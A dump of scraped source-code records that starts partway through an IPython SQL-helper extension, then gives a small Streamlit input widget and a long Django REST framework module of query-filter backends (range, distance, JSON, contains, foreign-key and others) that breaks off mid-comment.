extenstion function for searching for columns by name\n Usage: %findColumns column_name [db_alias (default: oradb)]\n :param column_name: Name of column\n :param db_alias:\n :return:\n \"\"\"\n\n def usage():\n print('Usage: %findColumns column_name [db_alias (default: {})]'.format(default_db_alias))\n\n status, col_name, alias = parse_line(line, usage)\n\n if status:\n try:\n dbu.findColumns(col_name, alias)\n except DatabaseError as e:\n print('{}'.format(e))\n\n\ndef getTabIndex(line):\n \"\"\"\n Ipython extenstion function for getting table indeces\n :param table_name: Name of table\n :param db_alias:\n :return: None\n \"\"\"\n\n def usage():\n print('Usage: %getTabIndex table_name [db_alias (default: {})]'.format(default_db_alias))\n\n status, table_name, alias = parse_line(line, usage)\n\n if status:\n try:\n dbu.getTableIndex(table_name, alias)\n except DatabaseError as e:\n print('{}'.format(e))\n\n\ndef read_sql(line, cell=None):\n \"\"\"\n Ipython extension function for running sql statements\n Usage: %read_sql [dbAlias (default: oradb)] sql|sql_file\n :param db_alias:\n :param sql: sql statement, sql variable, sql file\n :return: pd.DataFrame\n \"\"\"\n\n def usage():\n print('Usage: %read_sql [dbAlias (default: {})] sql|sql_file'.format(default_db_alias))\n\n # if 'default_db_alias' not in globals():\n # print('Variable default_db_alias not set')\n # else:\n # print('DB Alias: {}'.format(default_db_alias))\n\n line = line.strip()\n\n if len(line) == 0 and cell is None:\n usage()\n return\n\n if cell is None: # line magic\n alias = default_db_alias\n if dbu.isSql(line):\n sql = line\n elif os.path.isfile(line):\n print('File: {}'.format(line))\n with open(line) as f:\n sql = f.read()\n else:\n args = line.split(' ')\n alias = args[0].strip()\n sql = ' '.join(args[1:])\n\n if os.path.isfile(sql):\n print('File: {}'.format(sql))\n with open(sql) as f:\n sql = f.read()\n print('DB Alias: {}'.format(alias))\n if mysql_schema is not None:\n print('Mysql Schema: {}'.format(mysql_schema))\n try:\n df = dbu.readSql(sql, con=engine)\n return df\n except exc.DatabaseError as e:\n print('{}'.format(e))\n\n else:\n if len(line) == 0:\n alias = default_db_alias\n else:\n alias = line\n\n print('DB Alias: {}'.format(alias))\n\n if cell is not None:\n try:\n df = dbu.readSql(cell, con=engine)\n return df\n except exc.DatabaseError as e:\n print('{}'.format(e))\n return\n\n\ndef explain_sql(line, cell=None):\n \"\"\"\n Ipython extension for explaining sql statements\n Usage: %explain_sql [dbAlias (default: oradb)] sql\n :param dbAlias:\n :param sql: sql statement\n :return: None\n \"\"\"\n\n def usage():\n print('Usage: %explain_sql [dbAlias (default: {})] sql'.format(default_db_alias))\n\n line = line.strip()\n\n if len(line) == 0 and cell is None:\n usage()\n return\n\n if cell is None: # line magic\n\n if dbu.isSql(line):\n alias = default_db_alias\n sql = line\n else:\n args = line.split(' ')\n alias = args[0].strip()\n sql = ' '.join(args[1:])\n try:\n dbu.explainSQL(sql, alias.upper())\n except Exception as e:\n print('{}'.format(e))\n return\n\n else:\n if len(line) == 0:\n alias = default_db_alias\n else:\n alias = line\n\n if cell is not None:\n try:\n dbu.explainSQL(cell, alias)\n except DatabaseError as e:\n print('{}'.format(e))\n return\n else:\n return\n\n\ndef getDbAliases(line):\n \"\"\"\n IPython extension function for get a list of available db aliases.\n Usage: %getDbAliases [filter]\n :param filter: filter alias by string\n :return: None\n \"\"\"\n line = line.strip()\n dbu.getDbAliases(line)\n\n\ndef load_ipython_extension(ipython, *args):\n ipython.register_magic_function(setDefaultDbAlias, 'line', magic_name='setDefaultDbAlias')\n ipython.register_magic_function(read_sql, 'line_cell', magic_name='read_sql')\n ipython.register_magic_function(explain_sql, 'line_cell', magic_name='explain_sql')\n ipython.register_magic_function(getTables, 'line', magic_name='getTables')\n ipython.register_magic_function(getTableStats, 'line', magic_name='getTableStats')\n ipython.register_magic_function(getTabColumns, 'line', magic_name='getTabColumns')\n ipython.register_magic_function(findColumn, 'line', magic_name='findColumn')\n ipython.register_magic_function(getTabIndex, 'line', magic_name='getTabIndex')\n ipython.register_magic_function(gatherTableStats, 'line', magic_name='gatherTableStats')\n ipython.register_magic_function(getPackages, 'line', magic_name='getPackages')\n ipython.register_magic_function(getPackageFunctions, 'line', magic_name='getPackageFunctions')\n ipython.register_magic_function(findFunction, 'line', magic_name='findFunction')\n ipython.register_magic_function(getDbObjectSource, 'line', magic_name='getDbObjectSource')\n ipython.register_magic_function(helpsql, 'line', magic_name='helpsql')\n ipython.register_magic_function(getDbAliases, 'line', magic_name='getDbAliases')\n\n# # Uncomment if ever need to unload the extension\n# def unload_ipython_extension(ipython):\n# pass\n","repo_name":"mmarto/ipython-sql-ext","sub_path":"readSqlExt.py","file_name":"readSqlExt.py","file_ext":"py","file_size_in_byte":14521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3545679017","text":"import streamlit as st\n\ndef make_parameter_point(key, default_height = 70.0, default_width = 15.0):\n col1, col2, _ = st.columns(3)\n with col1:\n height = st.number_input(f\"{key.capitalize()} Height\", min_value = 0.1, value = default_height, step=1.0)\n with col2:\n width = st.number_input(f\"{key.capitalize()} Width\", min_value = 1.0, value = default_width, step=1.0)\n \n\n return {\n f'{key}_width':width,\n f'{key}_height':height\n }","repo_name":"medicationforall/obeliskterrainapp","sub_path":"app/controls/paramPoint.py","file_name":"paramPoint.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"38780676295","text":"# coding: utf-8\nimport uuid\nimport functools\nimport re\nfrom django.db.models import Q\nfrom django.contrib.gis.measure import D\nfrom django.contrib.auth import get_user_model\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.filters import BaseFilterBackend\nfrom concrete_datastore.api.v1.datetime import format_datetime, ensure_pendulum\nfrom django.contrib.gis.geos import Point\n\n# target_field type is date or datetime or int or float\nRANGEABLE_TYPES = (\n 'DateTimeField',\n 'DateField',\n 'DecimalField',\n 'IntegerField',\n 'FloatField',\n)\n\nTYPES_VALUES_MAP = {\n \"str\": lambda x: x,\n \"int\": lambda x: int(x),\n \"float\": lambda x: float(x),\n \"bool\": lambda x: True if x.lower() == 'true' else False,\n \"null\": lambda x: None,\n}\n\nJSON_FILTER_PATTERN = r'^\\\"(?P<str>.*)\\\"$|(?P<int>^\\d+$)|(?P<float>^\\d+\\.\\d+([e][+-]?\\d+)?$)|(?P<bool>^true$|^false$)|(?P<null>^null$|^none$)'\nREGEX_DATETIME_MICROSECOND = \"^\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}\\.\\d{1,6}Z$\"\nREGEX_DATETIME_SECOND = \"^\\d{4}-\\d{2}-\\d{2}T\\d{2}:\\d{2}:\\d{2}Z$\"\n\n\ndef cast_value_to_right_type(query_value):\n match = re.search(JSON_FILTER_PATTERN, query_value, flags=re.IGNORECASE)\n if match is None:\n raise ValueError(f'{query_value} is not a valid value')\n match_group = match.groupdict()\n q_type, q_value = next(\n (x, y) for x, y in match_group.items() if y is not None\n )\n return TYPES_VALUES_MAP[q_type](q_value)\n\n\ndef get_filter_field_type(model_class, param) -> str:\n \"\"\"\n Return the type (as String) of the target field that we want to filter\n \"\"\"\n splitted_param = param.split('__')\n if (\n model_class._meta.get_field(splitted_param[0]).get_internal_type()\n == 'JSONField'\n ):\n return 'JSONField'\n if len(splitted_param) == 1:\n return model_class._meta.get_field(\n splitted_param[0]\n ).get_internal_type()\n elif len(splitted_param) == 2:\n first_param, second_param = splitted_param\n if (\n model_class._meta.get_field(first_param).get_internal_type()\n != 'ForeignKey'\n ):\n raise ValidationError(\n {\n \"message\": (\n f\"{param}: Multi level filters\"\n \" available only for foreign keys\"\n )\n }\n )\n return (\n model_class._meta.get_field(first_param)\n .remote_field.model._meta.get_field(second_param)\n .get_internal_type()\n )\n\n # If we have field__fkfield__fkfieldfkfield or more, raise an error\n # We can at most have field__fkfield as filter\n else:\n raise ValidationError(\n {\n \"message\": (\n f\"{param}: filter not available for more than 1 level\"\n )\n }\n )\n\n\ndef ensure_uuid_valid(value, version=None):\n try:\n uuid.UUID(value, version=version)\n except ValueError:\n return False\n else:\n return True\n\n\ndef convert_type(string, field_type, close_period=True):\n if string == '':\n message = \"Attempting to convert an empty string to a date format\"\n raise ValidationError({\"message\": message})\n if field_type == 'DateTimeField':\n # Expected format YYYY-MM-DD HH:MM[:ss[.uuuuuu]][TZ]\n regex_ms = re.compile(REGEX_DATETIME_MICROSECOND)\n regex_second = re.compile(REGEX_DATETIME_SECOND)\n\n check_microseconds = regex_ms.match(str(string))\n check_seconds = regex_second.match(str(string))\n\n dt = ensure_pendulum(string)\n #: If the given value contains microseconds,\n #: the method convert_type must return the exact value\n if check_microseconds:\n return format_datetime(dt)\n\n #: If the given value does not contain microseconds but\n #: conains a datetime, the method convert_type must\n #: either return the `start_of` or `end_of` second, depending\n #: on the argument `close_period`\n #: Otherwise the return value should be the `start_of` or\n #: `end_of` day of the given date.\n #: the variable `time_limit_unit` will contain either\n #: `\"second\"` or `\"day\"`\n if check_seconds:\n time_limit_unit = 'second'\n else:\n time_limit_unit = 'day'\n if close_period is True:\n dt = dt.end_of(time_limit_unit)\n else:\n dt = dt.start_of(time_limit_unit)\n return format_datetime(dt)\n\n if field_type == 'DateField':\n # Expected YYYY-MM-DD\n dt = ensure_pendulum(string)\n # Deactivated by lco, a date is a date, no time in it\n # if close_period:\n # dt.end_of('day')\n return dt.to_date_string()\n if field_type in ('DecimalField', 'FloatField'):\n return float(string)\n #: Otherwise, the field is an IntegerField\n return int(string)\n\n\nclass CustomShemaOperationParameters:\n def return_if_not_details(self, view, value, extra_condition=True):\n if view.detail is False and extra_condition:\n return value\n return []\n\n def get_q_objects(self, q_filter, q_exclude, custom_filter, exclude):\n if exclude is False:\n if q_filter is None:\n q_filter = Q(**custom_filter)\n else:\n q_filter &= Q(**custom_filter)\n else:\n if q_exclude is None:\n q_exclude = Q(**custom_filter)\n else:\n q_exclude &= Q(**custom_filter)\n return q_filter, q_exclude\n\n def get_custom_filtered_queryset(self, qs, q_filter, q_exclude):\n if q_filter is not None:\n qs = qs.filter(q_filter)\n if q_exclude is not None:\n qs = qs.exclude(q_exclude)\n return qs\n\n\nclass ExcludeFilterBackend(DjangoFilterBackend):\n \"\"\"\n This class inherits form DjangoFilterBackend and uses only negated\n query_parms (only ending with '!')\n The filter method will exclude the result of super().filter_queryset\n The exclusion must be performed on each queryparam\n \"\"\"\n\n def get_negated_query_params(self, request, view):\n filterset_fields = getattr(view, 'filterset_fields', ())\n query_params = request.query_params\n return [\n {param[:-1]: value}\n for param, value in query_params.items()\n if param.endswith('!') is True\n and '__' not in param #: this is handeled by another class\n and '_uid' not in param #: this is handeled by another class\n and param[:-1] in filterset_fields\n ]\n\n def filter_queryset(self, request, queryset, view):\n def _get_unitary_filterset_backend(query_param):\n class UnitaryFilterBacked(DjangoFilterBackend):\n def get_filterset_kwargs(self, request, queryset, view):\n return {\n 'data': query_param,\n 'queryset': queryset,\n 'request': request,\n }\n\n return UnitaryFilterBacked().filter_queryset(\n request, queryset, view\n )\n\n for query_param in self.get_negated_query_params(request, view):\n filtered_qs = _get_unitary_filterset_backend(\n query_param=query_param\n )\n filtered_qs_pks = filtered_qs.values_list('pk', flat=True)\n queryset = queryset.exclude(pk__in=filtered_qs_pks)\n return queryset\n\n\nclass FilterDistanceBackend(BaseFilterBackend, CustomShemaOperationParameters):\n suffixes_map = {\n 'gte': (\n 'get the values greater than or equal to the given distance '\n '(expected value format: DISTANCE,LONGITUDE,LATITUDE)'\n ),\n 'lte': (\n 'get the values less than or equal to the given distance '\n '(expected value format: DISTANCE,LONGITUDE,LATITUDE)'\n ),\n 'gt': (\n 'get the values greater than the given distance '\n '(expected value format: DISTANCE,LONGITUDE,LATITUDE)'\n ),\n 'lt': (\n 'get the values less than the given distance '\n '(expected value format: DISTANCE,LONGITUDE,LATITUDE)'\n ),\n 'range': (\n 'get the values between the two given distances (expected '\n 'value format: DISTANCE1,DISTANCE2,LONGITUDE,LATITUDE)'\n ),\n 'range!': (\n 'get the values outside of the two given distances (expected '\n 'value format: DISTANCE1,DISTANCE2,LONGITUDE,LATITUDE)'\n ),\n }\n\n def remove_from_queryset(self, view):\n #: Remove PointField field from filterset_fields because\n #: they cannot be filtered with the other filter backends\n filterset_fields = getattr(view, 'filterset_fields', ())\n new_filterset_fields = tuple(\n filter_field\n for filter_field in filterset_fields\n if (\n get_filter_field_type(view.model_class, filter_field)\n != 'PointField'\n )\n )\n setattr(view, 'filterset_fields', new_filterset_fields)\n\n def get_schema_operation_parameters(self, view):\n params = []\n for key, description in self.suffixes_map.items():\n params.extend(\n [\n {\n 'name': f'{field_name}_distance_{key}',\n 'required': False,\n 'in': 'query',\n 'description': description,\n 'schema': {'type': 'string'},\n }\n for field_name in getattr(view, 'filterset_fields', ())\n if get_filter_field_type(view.model_class, field_name)\n == 'PointField'\n ]\n )\n\n self.remove_from_queryset(view=view)\n\n return self.return_if_not_details(view=view, value=params)\n\n def get_float_or_error(self, value):\n try:\n return float(value)\n except Exception:\n raise ValidationError(f'\"{value}\" is not a valid float')\n\n def filter_queryset(self, request, queryset, view):\n # Only applicable on PointField objects\n q_object_filter = None\n q_object_exclude = None\n query_params = request.query_params\n filterset_fields = getattr(view, 'filterset_fields', ())\n for param in query_params:\n exclude = False\n valid_param = any(\n [\n param.endswith(f'__distance_{lookup}')\n for lookup in self.suffixes_map.keys()\n ]\n )\n if valid_param is False:\n continue\n param_field, lookup = param.rsplit('__distance_', 1)\n if param_field not in filterset_fields:\n continue\n if (\n get_filter_field_type(queryset.model, param_field)\n != 'PointField'\n ):\n continue\n values = query_params.get(param).split(',')\n comparaison_lookup = lookup in ('lt', 'lte', 'gt', 'gte')\n range_lookup = lookup in ('range', 'range!')\n if comparaison_lookup is True:\n #: If the lookup is one of [lt, lte, gt, gte]\n #: the split should have three elements\n if len(values) != 3:\n raise ValidationError(\n f\"Distance filter with lookup {lookup} needs the \"\n \"following parameters: Distance, longitude and \"\n \"latitude\"\n )\n distance = self.get_float_or_error(values[0])\n longitude = self.get_float_or_error(values[1])\n latitude = self.get_float_or_error(values[2])\n point = Point(longitude, latitude)\n custom_filter = {param: (point, D(m=distance))}\n elif range_lookup is True:\n #: If the lookup is one of [range, range!]\n #: the split should have four elements\n if len(values) != 4:\n raise ValidationError(\n f\"Distance filter with lookup {lookup} needs the \"\n \"following parameters: Distance1, Distance2, \"\n \"longitude and latitude\"\n )\n distance1 = self.get_float_or_error(values[0])\n distance2 = self.get_float_or_error(values[1])\n min_distance = min(distance1, distance2)\n max_distance = max(distance1, distance2)\n longitude = self.get_float_or_error(values[2])\n latitude = self.get_float_or_error(values[3])\n point = Point(longitude, latitude)\n custom_filter = {\n '{}__distance_gte'.format(param_field): (\n point,\n D(m=min_distance),\n ),\n '{}__distance_lte'.format(param_field): (\n point,\n D(m=max_distance),\n ),\n }\n if lookup.endswith('!'):\n exclude = True\n else:\n raise ValidationError(\n f\"Distance filter with lookup {lookup} is not supported. \"\n f\"Supported lookup values are {list(self.suffixes_map)}\"\n )\n\n q_object_filter, q_object_exclude = self.get_q_objects(\n q_filter=q_object_filter,\n q_exclude=q_object_exclude,\n custom_filter=custom_filter,\n exclude=exclude,\n )\n\n self.remove_from_queryset(view=view)\n return self.get_custom_filtered_queryset(\n qs=queryset, q_filter=q_object_filter, q_exclude=q_object_exclude\n )\n\n\nclass FilterUserByLevel(BaseFilterBackend, CustomShemaOperationParameters):\n def get_schema_operation_parameters(self, view):\n params = [\n {\n 'name': 'level',\n 'required': False,\n 'in': 'query',\n 'schema': {'type': 'string'},\n },\n {\n 'name': 'level!',\n 'required': False,\n 'in': 'query',\n 'schema': {'type': 'string'},\n },\n {\n 'name': 'atleast',\n 'required': False,\n 'in': 'query',\n 'schema': {'type': 'string'},\n },\n {\n 'name': 'atleast!',\n 'required': False,\n 'in': 'query',\n 'schema': {'type': 'string'},\n },\n ]\n return self.return_if_not_details(\n view=view,\n value=params,\n extra_condition=view.model_class == get_user_model(),\n )\n\n def filter_queryset(self, request, queryset, view):\n # Only appyable on user models\n if view.basename.lower() != 'user':\n return queryset\n\n query_params = request.query_params\n if 'level' in query_params:\n return queryset.model.filter_by_exact_level(\n queryset=queryset, level=query_params.get('level')\n )\n if 'level!' in query_params:\n return queryset.model.exclude_by_exact_level(\n queryset=queryset, level=query_params.get('level!')\n )\n if 'atleast' in query_params:\n return queryset.model.filter_by_at_least_level(\n queryset=queryset, level=query_params.get('atleast')\n )\n if 'atleast!' in query_params:\n return queryset.model.exclude_by_at_least_level(\n queryset=queryset, level=query_params.get('atleast!')\n )\n\n return queryset\n\n\nclass FilterSupportingOrBackend(\n BaseFilterBackend, CustomShemaOperationParameters\n):\n def get_schema_operation_parameters(self, view):\n params = [\n {\n 'name': f'{field_name}__in{neg}',\n 'required': False,\n 'in': 'query',\n 'description': (\n 'List of values separated by comma'\n f'{\" (to exclude)\" if neg == \"!\" else \"\"}'\n ),\n 'schema': {'type': 'string'},\n }\n for field_name in getattr(view, 'filterset_fields', ())\n if get_filter_field_type(view.model_class, field_name)\n != 'ManyToManyField'\n for neg in ('', '!')\n ]\n return self.return_if_not_details(view=view, value=params)\n\n def filter_queryset(self, request, queryset, view):\n query_params = request.query_params\n filterset_fields = getattr(view, 'filterset_fields', ())\n\n q_object_filter = None\n q_object_exclude = None\n for param in query_params:\n exclude = False\n bare_param = param\n if param.endswith('!'):\n bare_param = param[:-1]\n exclude = True\n\n if not bare_param.endswith('__in'):\n continue\n if bare_param.replace('__in', '') not in filterset_fields:\n continue\n values = query_params.get(param).split(',')\n\n filter_field_type = get_filter_field_type(\n queryset.model, bare_param.replace('__in', '')\n )\n if filter_field_type in (\n 'UUIDField',\n 'ForeignKey',\n 'ManyToManyField',\n ):\n for value in values:\n if not ensure_uuid_valid(value):\n message = f\"'{value}' is not a valid UUID\"\n raise ValidationError(\n {\"message\": (f\"{bare_param}: {message}\")}\n )\n\n if filter_field_type == 'BooleanField':\n if set(values).difference(['True', 'False', 'None']):\n message = (\n f\"{bare_param}: {values} must contain olny 'True', \"\n \"'False' and/or 'None' (case sensitive)\"\n )\n raise ValidationError({\"message\": message})\n custom_filter = {bare_param: values}\n\n q_object_filter, q_object_exclude = self.get_q_objects(\n q_filter=q_object_filter,\n q_exclude=q_object_exclude,\n custom_filter=custom_filter,\n exclude=exclude,\n )\n\n return self.get_custom_filtered_queryset(\n qs=queryset, q_filter=q_object_filter, q_exclude=q_object_exclude\n )\n\n\nclass FilterJSONFieldsBackend(\n BaseFilterBackend, CustomShemaOperationParameters\n):\n def remove_from_queryset(self, view):\n #: Remove JSONField field from filterset_fields because\n #: they cannot be filtered with the other filter backends\n filterset_fields = getattr(view, 'filterset_fields', ())\n new_filterset_fields = tuple(\n filter_field\n for filter_field in filterset_fields\n if (\n get_filter_field_type(view.model_class, filter_field)\n != 'JSONField'\n )\n )\n setattr(view, 'filterset_fields', new_filterset_fields)\n\n def get_schema_operation_parameters(self, view):\n #: The json filter is generic and has no rules. So it is removed\n #: from the openAPI schema.\n #: In this method we will juste remove the JSON fields from the\n #: filterset_fields of the view and return an empty list\n\n self.remove_from_queryset(view=view)\n return []\n\n def filter_queryset(self, request, queryset, view):\n query_params = request.query_params\n filterset_fields = getattr(view, 'filterset_fields', ())\n\n q_object = None\n self.remove_from_queryset(view=view)\n q_object_filter = None\n q_object_exclude = None\n for param in query_params:\n exclude = False\n bare_param = param\n if param.endswith('!'):\n bare_param = param[:-1]\n exclude = True\n\n splitted_query_params = bare_param.split('__')\n if len(splitted_query_params) == 1:\n continue\n param_field_name = splitted_query_params[0]\n\n if param_field_name not in filterset_fields:\n continue\n if (\n get_filter_field_type(queryset.model, param_field_name)\n != 'JSONField'\n ):\n continue\n\n value = query_params.get(param)\n try:\n custom_filter = {bare_param: cast_value_to_right_type(value)}\n except ValueError as e:\n raise ValidationError({'message': f'\"{param}\": {e}'})\n q_object_filter, q_object_exclude = self.get_q_objects(\n q_filter=q_object_filter,\n q_exclude=q_object_exclude,\n custom_filter=custom_filter,\n exclude=exclude,\n )\n if q_object is None:\n q_object = Q(**custom_filter)\n else:\n q_object &= Q(**custom_filter)\n\n return self.get_custom_filtered_queryset(\n qs=queryset, q_filter=q_object_filter, q_exclude=q_object_exclude\n )\n\n\nclass FilterSupportingContainsBackend(\n BaseFilterBackend, CustomShemaOperationParameters\n):\n def get_schema_operation_parameters(self, view):\n params = [\n {\n 'name': f'{field_name}__contains{neg}',\n 'required': False,\n 'description': f'String{\" (to exclude)\" if neg == \"!\" else \"\"}',\n 'in': 'query',\n 'schema': {'type': 'string'},\n }\n for field_name in getattr(view, 'filterset_fields', ())\n if get_filter_field_type(view.model_class, field_name)\n in ('CharField', 'TextField')\n for neg in ('', '!')\n ]\n return self.return_if_not_details(view=view, value=params)\n\n def filter_queryset(self, request, queryset, view):\n query_params = request.query_params\n filterset_fields = getattr(view, 'filterset_fields', ())\n\n q_object_filter = None\n q_object_exclude = None\n for param in query_params:\n exclude = False\n bare_param = param\n if param.endswith('!'):\n bare_param = param[:-1]\n exclude = True\n\n if not bare_param.endswith('__contains'):\n continue\n param_field = bare_param.replace('__contains', '')\n if param_field not in filterset_fields:\n continue\n if not get_filter_field_type(queryset.model, param_field) in (\n 'CharField',\n 'TextField',\n ):\n continue\n\n custom_filter = {bare_param: query_params.get(param)}\n q_object_filter, q_object_exclude = self.get_q_objects(\n q_filter=q_object_filter,\n q_exclude=q_object_exclude,\n custom_filter=custom_filter,\n exclude=exclude,\n )\n\n return self.get_custom_filtered_queryset(\n qs=queryset, q_filter=q_object_filter, q_exclude=q_object_exclude\n )\n\n\nclass FilterSupportingInsensitiveContainsBackend(\n BaseFilterBackend, CustomShemaOperationParameters\n):\n def get_schema_operation_parameters(self, view):\n params = [\n {\n 'name': f'{field_name}__icontains{neg}',\n 'required': False,\n 'description': f'String{\" (to exclude)\" if neg == \"!\" else \"\"}',\n 'in': 'query',\n 'schema': {'type': 'string'},\n }\n for field_name in getattr(view, 'filterset_fields', ())\n if get_filter_field_type(view.model_class, field_name)\n in ('CharField', 'TextField')\n for neg in ('', '!')\n ]\n return self.return_if_not_details(view=view, value=params)\n\n def filter_queryset(self, request, queryset, view):\n query_params = request.query_params\n filterset_fields = getattr(view, 'filterset_fields', ())\n\n q_object_filter = None\n q_object_exclude = None\n for param in query_params:\n exclude = False\n bare_param = param\n if param.endswith('!'):\n bare_param = param[:-1]\n exclude = True\n\n if not bare_param.endswith('__icontains'):\n continue\n param_field = bare_param.replace('__icontains', '')\n if param_field not in filterset_fields:\n continue\n if not get_filter_field_type(queryset.model, param_field) in (\n 'CharField',\n 'TextField',\n ):\n continue\n\n custom_filter = {bare_param: query_params.get(param)}\n\n q_object_filter, q_object_exclude = self.get_q_objects(\n q_filter=q_object_filter,\n q_exclude=q_object_exclude,\n custom_filter=custom_filter,\n exclude=exclude,\n )\n\n return self.get_custom_filtered_queryset(\n qs=queryset, q_filter=q_object_filter, q_exclude=q_object_exclude\n )\n\n\nclass FilterSupportingEmptyBackend(\n BaseFilterBackend, CustomShemaOperationParameters\n):\n def get_schema_operation_parameters(self, view):\n params = [\n {\n 'name': f'{field_name}__isempty',\n 'required': False,\n 'in': 'query',\n 'description': 'True or False',\n 'schema': {'type': 'boolean'},\n }\n for field_name in getattr(view, 'filterset_fields', ())\n if get_filter_field_type(view.model_class, field_name)\n in ('CharField', 'TextField')\n ]\n return self.return_if_not_details(view=view, value=params)\n\n def filter_queryset(self, request, queryset, view):\n query_params = request.query_params\n filterset_fields = getattr(view, 'filterset_fields', ())\n\n q_object_filter = None\n q_object_exclude = None\n\n for param in query_params:\n exclude = False\n\n if not param.endswith('__isempty'):\n continue\n if query_params.get(param).lower() == 'false':\n exclude = True\n elif query_params.get(param).lower() != 'true':\n continue\n param = param.replace('__isempty', '')\n if param not in filterset_fields:\n continue\n if get_filter_field_type(queryset.model, param) in (\n 'CharField',\n 'TextField',\n ):\n custom_filter = {'{}__exact'.format(param): ''}\n else:\n continue\n q_object_filter, q_object_exclude = self.get_q_objects(\n q_filter=q_object_filter,\n q_exclude=q_object_exclude,\n custom_filter=custom_filter,\n exclude=exclude,\n )\n return self.get_custom_filtered_queryset(\n qs=queryset, q_filter=q_object_filter, q_exclude=q_object_exclude\n )\n\n\nclass FilterSupportingRangeBackend(\n BaseFilterBackend, CustomShemaOperationParameters\n):\n def get_schema_operation_parameters(self, view):\n params = [\n {\n 'name': f'{field_name}__range{neg}',\n 'required': False,\n 'in': 'query',\n 'description': (\n 'A range of values separated by comma'\n f'{\" (to exclude)\" if neg == \"!\" else \"\"}'\n ),\n 'schema': {'type': 'string'},\n }\n for field_name in getattr(view, 'filterset_fields', ())\n + ('creation_date', 'modification_date')\n if get_filter_field_type(view.model_class, field_name)\n in RANGEABLE_TYPES\n for neg in ('', '!')\n ]\n return self.return_if_not_details(view=view, value=params)\n\n def filter_queryset(self, request, queryset, view):\n query_params = request.query_params\n filterset_fields = getattr(view, 'filterset_fields', ()) + (\n 'creation_date',\n 'modification_date',\n )\n\n q_object_filter = None\n q_object_exclude = None\n\n for param in query_params:\n exclude = False\n bare_param = param\n if param.endswith('!'):\n bare_param = param[:-1]\n exclude = True\n if not param.endswith('__range'):\n continue\n target_field = bare_param.replace('__range', '')\n if target_field not in filterset_fields:\n continue\n\n target_field_type = get_filter_field_type(\n queryset.model, target_field\n )\n if target_field_type not in RANGEABLE_TYPES:\n continue\n\n values = query_params.get(param).split(',')\n\n if len(values) < 2:\n raise ValidationError(\n {\n \"message\": (\n \"A comma is expected in the value of the filter. \"\n \"Expected values are '<date1>,<date2>', '<date1>,'\"\n \" or ',<date2>'\"\n )\n }\n )\n if len(values) > 2:\n raise ValidationError(\n {\n \"message\": (\n 'Only two comma-separated values are expected, '\n f'got {len(values)}: {values}'\n )\n }\n )\n\n range_start, range_end = values\n\n if range_start == '' and range_end == '':\n continue\n\n elif range_start != '' and range_end == '':\n param = bare_param.replace('__range', '__gte')\n values = convert_type(\n range_start, target_field_type, close_period=False\n )\n\n elif range_start == '' and range_end != '':\n param = bare_param.replace('__range', '__lte')\n values = convert_type(\n range_end, target_field_type, close_period=True\n )\n\n else:\n values = (\n convert_type(\n range_start, target_field_type, close_period=False\n ),\n convert_type(\n range_end, target_field_type, close_period=True\n ),\n )\n\n custom_filter = {param: values}\n q_object_filter, q_object_exclude = self.get_q_objects(\n q_filter=q_object_filter,\n q_exclude=q_object_exclude,\n custom_filter=custom_filter,\n exclude=exclude,\n )\n\n return self.get_custom_filtered_queryset(\n qs=queryset, q_filter=q_object_filter, q_exclude=q_object_exclude\n )\n\n\nclass FilterSupportingComparaisonBackend(\n BaseFilterBackend, CustomShemaOperationParameters\n):\n def get_schema_operation_parameters(self, view):\n suffixes_map = {\n 'gte': 'get the values greater than or equal to a given value',\n 'lte': 'get the values less than or equal to a given value',\n 'gt': 'get the values greater than to a given value',\n 'lt': 'get the values less than to a given value',\n }\n params = []\n for key, description in suffixes_map.items():\n params.extend(\n [\n {\n 'name': f'{field_name}__{key}',\n 'required': False,\n 'in': 'query',\n 'description': f'{description}',\n 'schema': {'type': 'string'},\n }\n for field_name in getattr(view, 'filterset_fields', ())\n + ('creation_date', 'modification_date')\n if get_filter_field_type(view.model_class, field_name)\n in RANGEABLE_TYPES\n ]\n )\n return self.return_if_not_details(view=view, value=params)\n\n def filter_queryset(self, request, queryset, view):\n query_params = request.query_params\n filterset_fields = getattr(view, 'filterset_fields', ()) + (\n 'creation_date',\n 'modification_date',\n )\n\n def get_param_from_query(param):\n if param.endswith('__gte'):\n return param.replace('__gte', '')\n if param.endswith('__lte'):\n return param.replace('__lte', '')\n if param.endswith('__gt'):\n return param.replace('__gt', '')\n if param.endswith('__lt'):\n return param.replace('__lt', '')\n return None\n\n q_object_filter = None\n\n def get_custom_filters(param):\n target_field = get_param_from_query(param)\n if target_field not in filterset_fields:\n return None\n\n target_field_type = get_filter_field_type(\n queryset.model, target_field\n )\n if target_field_type not in RANGEABLE_TYPES:\n return None\n close_period = True\n if param.endswith('__lt') or param.endswith('__gte'):\n close_period = False\n value = convert_type(\n query_params.get(param),\n target_field_type,\n close_period=close_period,\n )\n if value is None:\n return None\n return {param: value}\n\n include_filters = [\n get_custom_filters(qp)\n for qp in query_params\n if get_custom_filters(qp) is not None\n ]\n q_object_filter = functools.reduce(\n lambda a, b: a & Q(**b), include_filters, Q()\n )\n return queryset.filter(q_object_filter)\n\n\nclass FilterSupportingForeignKey(\n BaseFilterBackend, CustomShemaOperationParameters\n):\n def get_schema_operation_parameters(self, view):\n params = [\n {\n 'name': f'{field_name}_uid{neg}',\n 'required': False,\n 'in': 'query',\n 'description': (\n f'UID of the FK{\" (to exclude)\" if neg == \"!\" else \"\"}'\n ),\n 'schema': {'type': 'string'},\n }\n for field_name in getattr(view, 'filterset_fields', ())\n if get_filter_field_type(view.model_class, field_name)\n == 'ForeignKey'\n for neg in ('', '!')\n ]\n return self.return_if_not_details(view=view, value=params)\n\n def filter_queryset(self, request, queryset, view):\n query_params = request.query_params\n filterset_fields = getattr(view, 'filterset_fields', ())\n q_object_filter = None\n q_object_exclude = None\n\n for param in query_params:\n exclude = False\n bare_param = param\n if param.endswith('!'):\n bare_param = param[:-1]\n exclude = True\n if not bare_param.endswith('_uid'):\n continue\n cleaned_param = bare_param.replace('_uid', '')\n if cleaned_param not in filterset_fields:\n continue\n cleaned_param_type = get_filter_field_type(\n queryset.model, cleaned_param\n )\n if not cleaned_param_type == 'ForeignKey':\n continue\n value = query_params.get(param)\n custom_filter = {cleaned_param: value}\n #: \"value\" must be a valid UUID4, otherwise raise ValidationError\n #: raises 